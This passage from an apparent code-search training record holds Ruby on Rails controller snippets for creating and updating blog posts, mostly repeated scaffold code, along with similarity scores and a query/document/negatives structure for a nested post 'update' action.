"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, :notice => \"slam\" }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { redirect_to posts_path }\n flash[:alert] = \"shit.\"\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n post\n end",
"def create\n @post = Post.new(content: params[:post][:content], user_id: @user.id)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @user }\n format.json { render :show, status: :created, location: @user }\n else\n format.html { redirect_to @user }\n format.json { render json: @user.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n\n end",
"def create\n @post = Post.new(post_params)\n @post.user_id = params[:user_id]\n if @post.save\n render json: @post, meta: { status: :created }, meta_key: 'result', status: :created\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = current_user.posts.new(post_params.merge(writter: current_user.name))\n\n if @post.save\n render json: {status: 1, id: @post.id.to_s, notice: \"新增成功,标题是:#{@post.title.capitalize}\", number: @post.number, errors: []}\n else\n render json: {status: -1, notice: \"新增失败,请先登录\", errors: @post.errors.full_messages}\n end\n end",
"def create\n puts \"Trying to Create New Post\"\n # Creates new post with given content tied to given userid\n @post = Post.new(post_params) \n if @post.save\n puts \"Post successfully created\"\n response.status=(201)\n render json: {status: \"Success\", message: [\"Post created!\"]}\n else\n # Error handling\n puts \"Something went wrong while creating new Post\"\n puts(@Post.errors.full_messages)\n response.status=(422)\n render json: { status: \"Error\", message: [@post.errors.full_messages]}\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to list_of_posts_post_path(@post.user), notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(*args)\n execute(:post, *args)\n end",
"def create\n redirect_to posts_path and return unless Mist.authorized?(:create_post, self)\n coerce_date(params[:post], 'published_at')\n @post = Mist::Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, :notice => 'Post was successfully created.' }\n format.json { render :json => @post, :status => :created, :location => @post }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render action: 'show', status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.build(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to new_post_successful_posts_path, notice: 'Anúncio criado com sucesso.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(*args)\n prepare_request(:post, args)\n @@client.add(:post, @path, *args)\n end",
"def create\n redirect_to login_path unless session[:user_id]\n message = 'Post was successfully created.'\n @post = Post.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: message }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @post.user = User.find_by_auth_token!(cookies[:auth_token])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render action: 'show', status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n if @post.save\n redirect_to find_redirect(@post.page)\n else\n render :new\n render json: @post.errors, status: :unprocessable_entity\n end\n end"
] |
[
"0.74463975",
"0.73221767",
"0.73072433",
"0.7123966",
"0.7015686",
"0.701327",
"0.69841874",
"0.6939327",
"0.69313824",
"0.69053805",
"0.68196476",
"0.6812792",
"0.6793222",
"0.6792862",
"0.6779654",
"0.6779654",
"0.67625546",
"0.67602354",
"0.67515427",
"0.6735786",
"0.66983837",
"0.6694823",
"0.6676922",
"0.6648634",
"0.6618174",
"0.6609208",
"0.6576672",
"0.6567517",
"0.6535031",
"0.65248317",
"0.6517826",
"0.6512526",
"0.6512526",
"0.65004253",
"0.64875203",
"0.6482612",
"0.64796066",
"0.6479418",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.64762664",
"0.6452396",
"0.6443543",
"0.64413923",
"0.6439579",
"0.6431225",
"0.6411242",
"0.64027417",
"0.6402409",
"0.63972473",
"0.63956606",
"0.6388207",
"0.6388207",
"0.6380103",
"0.63764375",
"0.6374259",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.63714516",
"0.6369631",
"0.6361449",
"0.6350474",
"0.6349784",
"0.6345706",
"0.6312865",
"0.63084143",
"0.630361",
"0.63009614",
"0.62957925",
"0.6295694",
"0.62955",
"0.6294854",
"0.62942207",
"0.628781",
"0.62877417",
"0.6283785",
"0.6282612",
"0.6263583"
] |
0.0
|
-1
|
PATCH/PUT /posts/1 PATCH/PUT /posts/1.json
|
def update
  @calendar = Calendar.find(params[:calendar_id])
  @event = Event.find(params[:event_id])
  # The original snippet referenced @post without ever assigning it;
  # look it up through the event so the nested scope is enforced.
  @post = @event.posts.find(params[:id])
  respond_to do |format|
    if @post.update(post_params)
      format.html { redirect_to [@calendar, @event, @post], notice: 'Post was successfully updated.' }
      # Point the JSON Location at the updated post itself, matching
      # the HTML redirect, rather than at the parent event.
      format.json { render :show, status: :ok, location: [@calendar, @event, @post] }
    else
      format.html { render :edit }
      format.json { render json: @post.errors, status: :unprocessable_entity }
    end
  end
end
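
# Both the create and update actions above call post_params, a
# strong-parameters helper that neither snippet shows. A minimal sketch,
# assuming :title and :body are the permitted attributes (the attribute
# names are assumptions, not taken from the original model):
private

def post_params
  params.require(:post).permit(:title, :body)
end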
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n render json: Post.update(params[\"id\"], params[\"post\"])\n end",
"def update\n respond_with Post.update(params[:id], params[:posts])\n end",
"def update\n @post = Post.find(params[:id])\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.json { render :json => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity}\n end\n end\n #respond_with Post.update(params[:id], params[:post])\n end",
"def update\n respond_with post.update(params[:id], params[:post])\n end",
"def update\n respond_with Post.update(params[:id],post_params)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(post_params)\n format.json { head :no_content }\n format.xml { head :no_content }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n format.xml { render xml: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update({\n title: post_params[:title],\n content: post_params[:content],\n })\n render json: Post.all.as_json\n else\n render json: {errors: @post.errors.full_messages}, status: :unprocessable_entity\n end\n end",
"def update\n id = Post.find(params[:id])._id\n \n respond_to do |format|\n if ((@post.update_attributes(params[:post])) && (@post._id = id))\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def api_patch(path, data = {})\n api_request(:patch, path, :data => data)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n @post.update_attributes(params[:post])\n format.html { redirect_to posts_url, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n end \n end",
"def update\n respond_to do |format|\n if @api_v1_post.update(api_v1_post_params)\n format.html { redirect_to @api_v1_post, notice: 'Post was successfully updated.' }\n format.json { render :show, status: :ok, location: @api_v1_post }\n else\n format.html { render :edit }\n format.json { render json: @api_v1_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to posts_path, notice: 'Post was successfully updated.' }\n format.json { render json: @post }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch!\n request! :patch\n end",
"def patch\n headers = {\"If-Match\" => @version}\n response = @context.request :patch, \"#{@path}/#{@id}\", @data.to_json, headers\n @version += 1\n response\n # 'X-HTTP-Method-Override' => 'PATCH'\n end",
"def update\n authenticated\n\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n @api_post = Api::Post.find(params[:id])\n\n if @api_post.update(api_post_params)\n head :no_content\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def update\n if @post.update(post_params)\n render json: {\n data: @post\n }\n else\n render json: {\n errors: @post.errors\n }\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @api_v2_post = Post.find(params[:id])\n\n respond_to do |format|\n if @api_v2_post.update_attributes(params[:api_v2_post])\n format.html { redirect_to @api_v2_post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @api_v2_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n authorize @post\n\n if @post.save\n render json: @post\n else\n render json: @post.errors.full_messages, status: :unprocessable_entity\n end\n end",
"def update\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@post = post.find(params[:id])\n\t\t@post.update_attributes(post_params)\n\t\trespond_to do |format|\n\t\t\tformat.html {redirect_to post_path(@post)}\n\t\t\tformat.json {render json: @post}\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.json { render :show, status: :ok, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\tif @post.update(post_params)\n\t\t\trender json: @post, status: :success\n\t\telse\n\t\t\trender json: @post.errors, status: :unprocessable_entity #422\n\t\tend\n\tend",
"def update\n @post = Post.find(params[:id])\n @title = \"EDIT\"\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, :notice => 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'slam updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n @post.update_attributes(params[:post])\n respond_with(@post)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: '' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update # PATCH\n raise NotImplementedError\n end",
"def update\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n if @post.update(post_params)\n head :no_content\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def update\n title = params[:title]\n body = params[:body]\n\n @post.update!(title: title, body: body)\n\n if @post.save!\n json_response(@post)\n else\n json_response(@post.errors)\n end\n end",
"def update\r\n @post = Post.find(params[:id])\r\n\r\n respond_to do |format|\r\n if @post.update_attributes(params[:post])\r\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\r\n format.json { head :no_content }\r\n else\r\n format.html { render action: \"edit\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update\n @user = current_user\n @post = @user.posts.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def test_update_post\n data = {\n title: \"Roll lemon\",\n content: \"Gingerbread bear claw muffin danish danish marzipan. Toffee lollipop wafer carrot cake dessert.\",\n description: \"Chocolate tootsie roll lemon drops. Chupa chups chocolate bar apple pie\",\n image: \"chocolate.png\",\n status: 1\n }\n expected = 200\n post_id = 1\n uri = URI.parse('http://localhost:3000/v1/posts/'+post_id.to_s)\n http = Net::HTTP.new(uri.host,uri.port)\n request = Net::HTTP::Put.new(uri.path)\n request.set_form_data(data)\n response = http.request(request)\n actual = JSON.parse(response.body)\n result = assert_equal(expected,actual['meta']['code'])\n puts this_method_name + \" - \" + result.to_s\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to :action => 'index', notice: 'Post was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @patch = Patch.find(params[:id])\n\n respond_to do |format|\n if @patch.update_attributes(params[:patch])\n format.html { redirect_to @patch, notice: 'Patch was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @patch.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if (@post.update(params.permit(:title, :content)))\n render json: @post, status: :ok\n else\n render json: @post.errors, status: 422\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to post_path, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch(path, data)\n request 'PATCH', path, body: data.to_json\n end",
"def update\n #disable edit for now\n redirect_to posts_path\n return\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n format.html { redirect_to magazine_post_path(@post.short_url), notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\", layout: \"editor\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @post.update(post_params)\n render action: \"show.json.jbuilder\"\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to post_path(@post), notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\t\n\t\tpost = @current_user.role == \"admin\" ? Post.find_by(id: params[:id]) : @current_user.posts.find_by(id: params[:id]) \n\t\tif post && post.update_attributes(post_params)\n\t\trender json: {success: true, auth_token: @current_user.authentication_token, post_id: post.id, post_desc: post.description}\n\t else\n\t render json: {success: false, message: \"not found or validation failed\"}, status: 422\n\t\tend \n\tend",
"def update\n post = Post.find_by(id: params[:id])\n # byebug\n\n post.assign_attributes(update_params)\n if post.valid?\n post.save\n render json: post, status: :created\n else\n render json: {errors: post.errors.full_messages}, status: 422\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
